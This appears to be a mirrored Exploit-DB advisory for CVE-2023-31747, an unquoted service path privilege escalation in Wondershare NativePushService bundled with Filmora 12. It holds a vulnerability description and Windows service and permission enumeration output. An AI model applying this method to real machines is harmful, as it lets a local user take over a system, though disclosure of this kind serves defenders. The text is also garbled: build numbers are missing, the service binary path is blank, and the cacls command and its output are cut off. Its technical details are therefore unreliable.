[local] Filmora 12 version ( Build - Unquoted Service Paths Privilege Escalation
2023-5-25 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:16 收藏

# Exploit Title: Filmora 12 version ( Build - Unquoted Service Paths Privilege Escalation
# Date: 20  May 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://filmora.wondershare.com
# Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE
# Version: Filmora 12 ( Build
# Tested on: Windows 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31747

Vulnerability description:
Filmora is a professional video editing software. Wondershare NativePush
Build was part of Filmora 12 (Build Wondershare
NativePush Build was installed while Filmora 12 was installed. The
service name "NativePushService" was vulnerable to unquoted service paths
vulnerability which led to full local privilege escalation in the affected
window operating system as the service "NativePushService" was running with
system privilege that the local user has write access to the directory
where the service is located. Effectively, the local user is able to
elevate to local admin upon successfully replacing the affected executable.

C:\sc qc NativePushService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NativePushService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   :
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Native Push Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare



                      NT AUTHORITY\SYSTEM:(ID)F



文章来源: https://www.exploit-db.com/exploits/51483